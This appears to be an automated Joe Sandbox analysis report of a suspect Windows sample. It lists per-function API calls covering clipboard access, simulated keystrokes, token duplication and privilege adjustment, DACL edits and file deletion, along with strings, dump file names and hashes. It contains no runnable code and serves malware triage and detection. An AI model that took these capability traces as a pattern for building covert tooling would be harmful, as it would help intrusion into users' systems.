SendMessageW.USER32 ref: 00739B1A
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00739B3B
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00739B4A
GetCursorPos.USER32(?), ref: 00739B68
ScreenToClient.USER32(?,?), ref: 00739B75
GetParent.USER32(?), ref: 00739B93
SendMessageW.USER32(?,00001012,00000000,?), ref: 00739BFA
SendMessageW.USER32 ref: 00739C2B
ClientToScreen.USER32(?,?), ref: 00739C84
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00739CB4
SendMessageW.USER32(?,00001111,00000000,?), ref: 00739CDE
SendMessageW.USER32 ref: 00739D01
ClientToScreen.USER32(?,?), ref: 00739D4E
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00739D82

Part of subcall function 006B9944: GetWindowLongW.USER32(?,000000EB), ref: 006B9952

GetWindowLongW.USER32(?,000000F0), ref: 00739E05

Strings

F, xrefs: 00739D07
@GUI_DRAGID, xrefs: 0073997D
p#w, xrefs: 00739990

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
String ID: @GUI_DRAGID$F$p#w
API String ID: 3429851547-627597586
Opcode ID: bed654f3ef5d19c0c6aadf4a4b7b3870e4c0278d0706a50ff7625afa3a5919d3
Instruction ID: e037ac88f4ecdd623e1b57b4e700fbf5271b26765d091b7dff10d6fb3e612bbd
Opcode Fuzzy Hash: bed654f3ef5d19c0c6aadf4a4b7b3870e4c0278d0706a50ff7625afa3a5919d3
Instruction Fuzzy Hash: E042CB31205240EFEB21CF28CC45AAABBE5FF49310F10465DF699972A2D7B9E860CF55

Function 00734873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 007348F3
SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00734908
SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00734927
SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0073494B
SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0073495C
SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0073497B
SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 007349AE
SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 007349D4
SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00734A0F
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00734A56
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00734A7E
IsMenu.USER32(?), ref: 00734A97
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00734AF2
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00734B20
GetWindowLongW.USER32(?,000000F0), ref: 00734B94
SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00734BE3
SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00734C82
wsprintfW.USER32 ref: 00734CAE
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00734CC9
GetWindowTextW.USER32(?,00000000,00000001), ref: 00734CF1
SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00734D13
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00734D33
GetWindowTextW.USER32(?,00000000,00000001), ref: 00734D5A

Strings

%d/%02d/%02d, xrefs: 00734CA8

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
String ID: %d/%02d/%02d
API String ID: 4054740463-328681919
Opcode ID: 6cc8c88ec8e1071e624438f26c2e8aa436392df011b9e77521c016b13b561727
Instruction ID: 387dab52879ec4c59fbbbcd9a1c547570e87c905e97c2ebe86ddf07549d56613
Opcode Fuzzy Hash: 6cc8c88ec8e1071e624438f26c2e8aa436392df011b9e77521c016b13b561727
Instruction Fuzzy Hash: 19120071600214ABFB298F24CC4AFAE7BF8FF45310F148169F515EA2E2DB78A941CB50

Function 006BF98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 006BF998
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 006FF474
IsIconic.USER32(00000000), ref: 006FF47D
ShowWindow.USER32(00000000,00000009), ref: 006FF48A
SetForegroundWindow.USER32(00000000), ref: 006FF494
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 006FF4AA
GetCurrentThreadId.KERNEL32 ref: 006FF4B1
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 006FF4BD
AttachThreadInput.USER32(?,00000000,00000001), ref: 006FF4CE
AttachThreadInput.USER32(?,00000000,00000001), ref: 006FF4D6
AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 006FF4DE
SetForegroundWindow.USER32(00000000), ref: 006FF4E1
MapVirtualKeyW.USER32(00000012,00000000), ref: 006FF4F6
keybd_event.USER32(00000012,00000000), ref: 006FF501
MapVirtualKeyW.USER32(00000012,00000000), ref: 006FF50B
keybd_event.USER32(00000012,00000000), ref: 006FF510
MapVirtualKeyW.USER32(00000012,00000000), ref: 006FF519
keybd_event.USER32(00000012,00000000), ref: 006FF51E
MapVirtualKeyW.USER32(00000012,00000000), ref: 006FF528
keybd_event.USER32(00000012,00000000), ref: 006FF52D
SetForegroundWindow.USER32(00000000), ref: 006FF530
AttachThreadInput.USER32(?,000000FF,00000000), ref: 006FF557

Strings

Shell_TrayWnd, xrefs: 006FF46F

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: f9f0bcc1a787bf6a16a9617c8a1b013c40baa7d5b5cf2c94595593cf22a69d1c
Instruction ID: 18be2871d634e2bf4d2ee341ca350bb135bad633a29df26ee0adfcb6a9fc2925
Opcode Fuzzy Hash: f9f0bcc1a787bf6a16a9617c8a1b013c40baa7d5b5cf2c94595593cf22a69d1c
Instruction Fuzzy Hash: 11316D71A4021CBAFB216BB54C4AFBF7E6DEB44B51F104066FA00F61D1C6B49910ABA4

Function 00701201 Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 007016C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0070170D
Part of subcall function 007016C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0070173A
Part of subcall function 007016C3: GetLastError.KERNEL32 ref: 0070174A

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00701286
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 007012A8
CloseHandle.KERNEL32(?), ref: 007012B9
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 007012D1
GetProcessWindowStation.USER32 ref: 007012EA
SetProcessWindowStation.USER32(00000000), ref: 007012F4
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00701310

Part of subcall function 007010BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007011FC), ref: 007010D4
Part of subcall function 007010BF: CloseHandle.KERNEL32(?,?,007011FC), ref: 007010E9

Strings

default, xrefs: 0070130B
, xrefs: 0070125A
Zv, xrefs: 00701392
winsta0, xrefs: 007012CC

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0$Zv
API String ID: 22674027-1252836245
Opcode ID: d481a6ba6e1b2e97362bcf3a4fb95470aba074cead5a98f64be3b78d7ed5c5e9
Instruction ID: 4a38109253b7e6f0f615feb457c53a2c5f72bb6373dd70a84ebf70f2a1926836
Opcode Fuzzy Hash: d481a6ba6e1b2e97362bcf3a4fb95470aba074cead5a98f64be3b78d7ed5c5e9
Instruction Fuzzy Hash: 9B8189B1900249EBEF219FA4DC49FEE7BB9EF04704F148229F911B61A0C7798954CB65

Function 00700B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 007010F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00701114
Part of subcall function 007010F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00700B9B,?,?,?), ref: 00701120
Part of subcall function 007010F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00700B9B,?,?,?), ref: 0070112F
Part of subcall function 007010F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00700B9B,?,?,?), ref: 00701136
Part of subcall function 007010F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0070114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00700BCC
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00700C00
GetLengthSid.ADVAPI32(?), ref: 00700C17
GetAce.ADVAPI32(?,00000000,?), ref: 00700C51
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00700C6D
GetLengthSid.ADVAPI32(?), ref: 00700C84
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00700C8C
HeapAlloc.KERNEL32(00000000), ref: 00700C93
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00700CB4
CopySid.ADVAPI32(00000000), ref: 00700CBB
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00700CEA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00700D0C
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00700D1E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00700D45
HeapFree.KERNEL32(00000000), ref: 00700D4C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00700D55
HeapFree.KERNEL32(00000000), ref: 00700D5C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00700D65
HeapFree.KERNEL32(00000000), ref: 00700D6C
GetProcessHeap.KERNEL32(00000000,?), ref: 00700D78
HeapFree.KERNEL32(00000000), ref: 00700D7F

Part of subcall function 00701193: GetProcessHeap.KERNEL32(00000008,00700BB1,?,00000000,?,00700BB1,?), ref: 007011A1
Part of subcall function 00701193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00700BB1,?), ref: 007011A8
Part of subcall function 00701193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00700BB1,?), ref: 007011B7

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 22e562c38cec16a24241ffb9f8fb84e55b192612fb147cc08f07782e32a8e4ec
Instruction ID: d1373ac5102d4c9dd3439ea438bdd97c47f49009cccee20cd43ff874edf833cb
Opcode Fuzzy Hash: 22e562c38cec16a24241ffb9f8fb84e55b192612fb147cc08f07782e32a8e4ec
Instruction Fuzzy Hash: A1715C76A0020AEBEF11DFA4DC45FEEBBB9BF04311F048615E914B6191D779A905CBB0

Function 0071EAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(0073CC08), ref: 0071EB29
IsClipboardFormatAvailable.USER32(0000000D), ref: 0071EB37
GetClipboardData.USER32(0000000D), ref: 0071EB43
CloseClipboard.USER32 ref: 0071EB4F
GlobalLock.KERNEL32(00000000), ref: 0071EB87
CloseClipboard.USER32 ref: 0071EB91
GlobalUnlock.KERNEL32(00000000), ref: 0071EBBC
IsClipboardFormatAvailable.USER32(00000001), ref: 0071EBC9
GetClipboardData.USER32(00000001), ref: 0071EBD1
GlobalLock.KERNEL32(00000000), ref: 0071EBE2
GlobalUnlock.KERNEL32(00000000), ref: 0071EC22
IsClipboardFormatAvailable.USER32(0000000F), ref: 0071EC38
GetClipboardData.USER32(0000000F), ref: 0071EC44
GlobalLock.KERNEL32(00000000), ref: 0071EC55
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0071EC77
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0071EC94
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0071ECD2
GlobalUnlock.KERNEL32(00000000), ref: 0071ECF3
CountClipboardFormats.USER32 ref: 0071ED14
CloseClipboard.USER32 ref: 0071ED59

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: 403d2a0aa0ba691c5a72581165de6ca9cde2da97bd9c05bfdf3c77bf9893dc7c
Instruction ID: ee406d6f0062ce37e0a4da5499de81d61d20c239bdff5cddb82ac2e160dbb7b2
Opcode Fuzzy Hash: 403d2a0aa0ba691c5a72581165de6ca9cde2da97bd9c05bfdf3c77bf9893dc7c
Instruction Fuzzy Hash: 0261F4752042019FE311EF28D889F6A77E4AF85704F18851DF846972E2CB39DD85CB66

Function 0071698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 007169BE
FindClose.KERNEL32(00000000), ref: 00716A12
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00716A4E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00716A75

Part of subcall function 006A9CB3: _wcslen.LIBCMT ref: 006A9CBD

FileTimeToSystemTime.KERNEL32(?,?), ref: 00716AB2
FileTimeToSystemTime.KERNEL32(?,?), ref: 00716ADF

Strings

%03d, xrefs: 00716DA2
%4d%02d%02d%02d%02d%02d%03d, xrefs: 00716B32
%02d, xrefs: 00716C00, 00716C0A, 00716C5A, 00716CAA, 00716CFA, 00716D4A
%4d%02d%02d%02d%02d%02d, xrefs: 00716B6A
%4d, xrefs: 00716BB1

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: bbcf526e2609013a0123f1fd663d98d64b3365d9c3edb8becebefe6ba5e729a1
Instruction ID: 6628910c339f205b17eb2d467654188cf52322b6679eccc53ab9395940c83676
Opcode Fuzzy Hash: bbcf526e2609013a0123f1fd663d98d64b3365d9c3edb8becebefe6ba5e729a1
Instruction Fuzzy Hash: 56D15EB2508300AEC354EBA4CC81EABB7EDBF89704F44491DF585D6191EB38DE48CB66

Function 00719642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 00719663
GetFileAttributesW.KERNEL32(?), ref: 007196A1
SetFileAttributesW.KERNEL32(?,?), ref: 007196BB
FindNextFileW.KERNEL32(00000000,?), ref: 007196D3
FindClose.KERNEL32(00000000), ref: 007196DE
FindFirstFileW.KERNEL32(*.*,?), ref: 007196FA
SetCurrentDirectoryW.KERNEL32(?), ref: 0071974A
SetCurrentDirectoryW.KERNEL32(00766B7C), ref: 00719768
FindNextFileW.KERNEL32(00000000,00000010), ref: 00719772
FindClose.KERNEL32(00000000), ref: 0071977F
FindClose.KERNEL32(00000000), ref: 0071978F

Strings

*.*, xrefs: 007196F5

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: 91b5cd6d218f9d0d18ca9fd1343d7b6f0e6746669f4b503f64bdbd0c0f10cd38
Instruction ID: 3ce0f25f6a1569c6b1784ff24519d938b833c04512a62d50cdc403c9ec6d8a5a
Opcode Fuzzy Hash: 91b5cd6d218f9d0d18ca9fd1343d7b6f0e6746669f4b503f64bdbd0c0f10cd38
Instruction Fuzzy Hash: 8E31D5725012196AEF15AFB8DC19EDE77ACAF09321F108155F905E30D0DB3CDE818B24

Function 0071979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 007197BE
FindNextFileW.KERNEL32(00000000,?), ref: 00719819
FindClose.KERNEL32(00000000), ref: 00719824
FindFirstFileW.KERNEL32(*.*,?), ref: 00719840
SetCurrentDirectoryW.KERNEL32(?), ref: 00719890
SetCurrentDirectoryW.KERNEL32(00766B7C), ref: 007198AE
FindNextFileW.KERNEL32(00000000,00000010), ref: 007198B8
FindClose.KERNEL32(00000000), ref: 007198C5
FindClose.KERNEL32(00000000), ref: 007198D5

Part of subcall function 0070DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0070DB00

Strings

*.*, xrefs: 0071983B

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: 9ff0a39c8b4446fc6d0cced040b17c557883a25af446ab0c033bcb77c8d79e41
Instruction ID: fdd8dd5c6f38a39edd9026843a6a02e5afa8968be3dc809157535169d2addeb8
Opcode Fuzzy Hash: 9ff0a39c8b4446fc6d0cced040b17c557883a25af446ab0c033bcb77c8d79e41
Instruction Fuzzy Hash: 2431C572500219AEEF11AFB8DC58ADE77ACEF06321F108155E915A30D0DB38DEC6CB24

Function 00718195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00718257
SystemTimeToFileTime.KERNEL32(?,?), ref: 00718267
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00718273
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00718310
SetCurrentDirectoryW.KERNEL32(?), ref: 00718324
SetCurrentDirectoryW.KERNEL32(?), ref: 00718356
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0071838C
SetCurrentDirectoryW.KERNEL32(?), ref: 00718395

Strings

*.*, xrefs: 0071839B

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: 48452b16928ef603588618d09cca59f2c2779492830f2bac37c443cacdf16ff5
Instruction ID: ee5a00459475c0016f33f05d97cb47686beae59588e32ce1db2c221b064d05e6
Opcode Fuzzy Hash: 48452b16928ef603588618d09cca59f2c2779492830f2bac37c443cacdf16ff5
Instruction Fuzzy Hash: 166199B25043059FCB50EF24C8409AEB3E9FF89310F04891EF99983291EB39E945CF96

Function 0070D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 006A3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006A3A97,?,?,006A2E7F,?,?,?,00000000), ref: 006A3AC2

Part of subcall function 0070E199: GetFileAttributesW.KERNEL32(?,0070CF95), ref: 0070E19A

FindFirstFileW.KERNEL32(?,?), ref: 0070D122
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0070D1DD
MoveFileW.KERNEL32(?,?), ref: 0070D1F0
DeleteFileW.KERNEL32(?,?,?,?), ref: 0070D20D
FindNextFileW.KERNEL32(00000000,00000010), ref: 0070D237

Part of subcall function 0070D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0070D21C,?,?), ref: 0070D2B2

FindClose.KERNEL32(00000000,?,?,?), ref: 0070D253
FindClose.KERNEL32(00000000), ref: 0070D264

Strings

\*.*, xrefs: 0070D0CD, 0070D0D6, 0070D0EB

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: 2123958ab6224cfcd3116ee9523b54832fffbfcf6e535070563ba814728b8c0b
Instruction ID: 5b485ea974199b4da6998b3135cce1f03d8f384a23903385a0476121bb0d31b6
Opcode Fuzzy Hash: 2123958ab6224cfcd3116ee9523b54832fffbfcf6e535070563ba814728b8c0b
Instruction Fuzzy Hash: A0615E3180121DDACF15FBE0D9529EDB7B6AF55300F248269E40277191EB386F09CF65

Function 0071ED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0071ED91
EmptyClipboard.USER32 ref: 0071ED97
GlobalAlloc.KERNEL32(00000002,?), ref: 0071EDAC
CloseClipboard.USER32 ref: 0071EEA3

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 5705526faaaa3166002226cbc754cff79106ee905d0d9dffa1bfb04532aadb1c
Instruction ID: 66263e73eae3fca92356e683730931daf0f21c77e5e702b0db48aa06776f526b
Opcode Fuzzy Hash: 5705526faaaa3166002226cbc754cff79106ee905d0d9dffa1bfb04532aadb1c
